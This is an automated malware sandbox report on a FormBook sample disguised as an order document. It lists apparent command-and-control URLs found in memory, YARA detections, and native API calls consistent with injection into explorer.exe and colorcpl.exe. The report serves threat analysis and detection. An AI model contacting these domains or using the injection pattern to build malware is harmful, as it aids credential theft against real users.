          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.pinupcasino-start.site/riai/www.learningfitbit.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.pinupcasino-start.siteReferer:
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.skipbinsplus.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.skipbinsplus.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.skipbinsplus.com/riai/www.controlservicesreport.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.skipbinsplus.comReferer:
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.stuntmemorabilia.net
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.stuntmemorabilia.net/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.stuntmemorabilia.net/riai/www.yourbesttacolife.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.stuntmemorabilia.netReferer:
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.thewellbeingsutra.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.thewellbeingsutra.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.thewellbeingsutra.com/riai/www.stuntmemorabilia.net
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.thewellbeingsutra.comReferer:
          Source: explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.upperish.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.upperish.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.upperish.com/riai/www.elevictory.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.upperish.comReferer:
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.yourbesttacolife.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.yourbesttacolife.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.yourbesttacolife.com/riai/www.dingolope.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.yourbesttacolife.comReferer:
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: NEW ORDER ELO-05756485.exeString found in binary or memory: https://www.gnu.org
          Source: NEW ORDER ELO-05756485.exeString found in binary or memory: https://www.gnu.org/licenses/
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.351832870.0000000000B88000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: NEW ORDER ELO-05756485.exe
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07380AA8 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07380AA2 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0041A060 NtClose,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0041A110 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00419F30 NtCreateFile,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00419FE0 NtReadFile,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0041A05A NtClose,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00419F2B NtCreateFile,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013595D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013599D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0135B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013598A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0135A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359A10 NtQuerySection,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0135AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359560 NtWriteFile,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013595F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0135A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0135A770 NtOpenThread,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359760 NtOpenProcess,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013596D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569560 NtWriteFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0456AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0456A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0456A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0456B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0456A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0255A060 NtClose,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0255A110 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02559F30 NtCreateFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02559FE0 NtReadFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0255A05A NtClose,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02559F2B NtCreateFile,
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_028BDB4C
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_028BE211
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_028BC148
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_028BA758
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07381170
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07387FE5
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07380878
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07386861
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07384557
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_073825E3
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0738648B
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07388130
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07381166
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07380040
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07389DE8
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07386B2D
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07386B1E
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07386B0D
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07386AB0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07382AA0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07386AA4
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07382A90
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07386AE3
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07386ACA
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07380868
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07617F12
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07612670
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_076185E0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07614C00
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_076194E0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07617348
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07617BC0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_076149B0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0761AF28
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0761AF1A
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0761F7F0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_076167C8
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0761C786
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0761B5A2
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0761B5B0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0761BC69
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0761A400
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_076194C6
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0041E1B5
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0041E428
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00409E40
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00409E3C
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01334120
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0131F900
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013399BF
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133A830
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013EE824
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D1002
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013420A0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E20A8
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0132B090
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E28EC
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E2B28
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133AB40
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134EBB0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D03DA
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013DDBD2
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013CFA2B
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E22AE
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01310D20
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E2D07
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E1D55
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01342581
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0132D5E0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E25DD
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0132841F
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013DD466
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E1FF1
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013EDFCE
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01336E30
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013DD616
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E2EF7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045ED466
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0453841F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F1D55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F2D07
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04520D20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F25DD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0453D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04552581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045ED616
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04546E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F2EF7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045FDFCE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F1FF1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E1002
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045FE824
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F28EC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0453B090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045520A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F20A8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0452F900
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04544120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F22AE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F2B28
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E03DA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045EDBD2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0255E1B5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02549E40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02549E3C
